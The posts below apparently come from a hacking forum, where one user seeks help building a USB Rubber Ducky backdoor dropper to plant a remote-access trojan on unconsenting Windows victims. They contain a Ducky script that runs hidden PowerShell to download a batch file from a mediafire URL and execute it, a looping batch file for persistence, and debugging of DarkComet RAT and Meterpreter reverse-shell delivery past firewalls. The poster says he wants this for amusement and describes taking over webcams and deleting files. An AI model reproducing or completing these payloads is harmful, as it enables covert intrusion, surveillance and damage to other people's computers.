Haxineer1337

Can't we just use a downloader and a batch file? Also, if we use a remote ip can we get remote access?

I think this would work: [bATCH FILE] @echo off :TOP /t timeout 60 powershell Stop-Process -processname C:\reverse.exe powershell Start-Process C:\reverse.exe GOTO TOP The only problem is that it kinda restarts the program even if it running. I imagine that being able to not restart if it's already on would be pretty difficult. If you have access with netcat to their computer, I think you would be able to move this file to the startup folder. [sAVE IT AS A .BAT file.]

I am going to try to make a powershell script to do so. It might be a day or two.

Yes, but I need help making the actual backdoor..

[Help] I need a backdoor dropper for the ducky, or help on making one. What it needs to do: Work on windows (victim) Work over the internet Be sort-of fast (like, not typing out stuff forever) Persistent (Across reboots) I can use LINUX, BACKTRACK, WINDOWS, or any other linux distro, like KALI. I can also upload an exe to mediafire for wget and execute (I don't need help with that). I just need help making the file and or ducky script. -Thanks in advance.

Ok. I will provide screenshots soon.

Sorry about the preschool remark. I know media fire doesn't allow direct links. I got it by right clicking the download button, selecting inspect element, and finding the link that the button lead you to. I've tested it on another computer and it's worked.

@xcell You obviously haven't tested it either [or been to preschool for that matter], because that, my friend, is a direct download link. It has been fully tested and works 100%. Good day, sir. PS: Do you really think that pop ups are more dangerous than a backdoor? Back doors let you take full control of their computer. You can delete files, use their webcam, open 100s of web pages, etc.. That interrupts their work flow even more than a pop up powershell that's easy to get rid of.

Then what's the point of having a ducky if you are using it for "demonstration"? I payed 50 dollars for something that makes me laugh, not "demonstrate".

[Told you it was coming soon...] [bROKEN AS OF NOW, MEDIAFIRE HATES ME] TROLL FACE VIRUS PAYLOAD: [What it does]: Runs powershell to wget and execute a bat file that wgets and executes the requirements [HIDDEN] Every 60 seconds it loads up your browser if not already opened and opens a troll face. The only way to remove it is to go to task manager and end cmd.exe and timeout.exe. Works on windows 7, replace CONTROL ESCAPE with GUI r for it to work with windows 8 and 7. Working on startup persistence SCRIPT: DELAY 20000 CONTROL ESCAPE DELAY 1100 STRING powershell -windowstyle hidden (new-object System.Net.WebClient).DownloadFile('http://download1585.mediafire.com/3j2upgu7avbg/8runbhhu8fjrjah/Runner1.bat','C:\windowstp.bat'); Start-Process "C:\windowstp.bat" ENTER

That was the problem. It works now, thanks.

Thanks for all the help. I will try today at about 4 and tell you if it works.

Thanks for the example. Can someone help with the downloader problem? Thanks protocol

Thanks. Do you know powershell?

Thanks, can you shed some light on this problem?

Thanks for the reply. If you look at my other topic, I was going to upload a DarkComet RAT to the system. I tested the powershell wget and execute with a text file, (UPLOADED TO MEDIAFIRE), and thought it worked. IT DID NOT. THE TEXT FILE SEEMS TO BE IN SOME SORT OF HTML FORMAT. That means that was why the exe file was corrupted and not downloading. So it seems I must abandon this topic, as I do not require meterpreter any more. If you can shine some light on my other topic, I would be very grateful. Thanks for the initial reply.

Ok. I just found out that it never worked. Here's what the text file said: IT DID NOT DOWNLOAD THE FILE. IT DOWNLOADED THE WEBPAGE. Can someone please help me make a script that actually downloads the file instead of the webpage?! Thanks! Thanks, MB THIS IS NOT WHAT THE TEXT FILE THAT I UPLOADED SAID.

I've tried setting up a FTP server, but failed horribly. I think I am going to actually use meterpreter, and then upload and execute the RAT.

Ok. I have a Virtual Machine running BackTrack R5. How will I be able to make a reverse_tcp payload that connects over the internet when the victim has a strict NAT and a firewall? NEEDS TO USE METERPRETER. I NEED THIS TO WORK WITH THE DUCKY. PAST PROBLEMS HAVE COME UP WHERE THE EXE DOES NOT EXECUTE, PROBABLY DUE TO THE VIRUS BLOCK IN POWERSHELL. (TXT WORKS IN POWERSHELL) Thanks. ALSO: I HAVE TRIED DARK COMET BUT, AS AFOREMENTIONED, IT DOES NOT WORK. I CAN UPLOAD AND EXECUTE A DARK COMET RAT WITH METERPRETER.

It is a RAT stud, and it is identified by lots of antiviruses. It technically just drops a RAT on their computer. Let me try doing it with something like a text file. EDIT: UMG IT WORKS WITH THE TEXT FILE. Great, now I can't drop the RAT. Anyone have any ideas? ALSO POSSIBLE: THE EXE COULD HAVE GOTTEN CORRUPTED

I have resolved that problem. Please help me resolve the current problem. Thank you for helping.

OLD PROBLEM: Problem Solved The aforementioned problem was actually caused by how the RAT melted itself. Therefore, when I uploaded it, it turned to 0kb and never worked. NEW PROBLEM: I have a RAT Stub on mediafire (Shared Files) The powershell wget and execute script runs and the box pops up and shortly closes due to the windowstyle hidden feature. The file successfully downloads to the C drive, but never executes it. I try to execute it manually and it says that "This program is not compatible with the version of windows you're running". This is weird because if I download and execute it manually it works (I make a box pop up), it's just the powershell downloader that screws it up. Can someone help? I'd appreciate it, thanks. UPDATE: OK, ON MEDIAFIRE THE FILE IS 659KB, BUT THE FILE THE FILE DOWNLOADED WITH POWERSHELL IS ONLY 92.5KB. HELP?! UPDATE UPDATE: IT SEEMS THAT THE DOWNLOADER IS DOWNLOADING THE WEBPAGE AND NOT THE FILE. HELP? Code: (Runs Test stub which is suppose to open up a text window): Start-Process : This command cannot be run due to the error: The specified executable is not a valid application for this OS platform.. At line:1 char:121 + ... \testub.exe'); Start-Process C:\testub.exe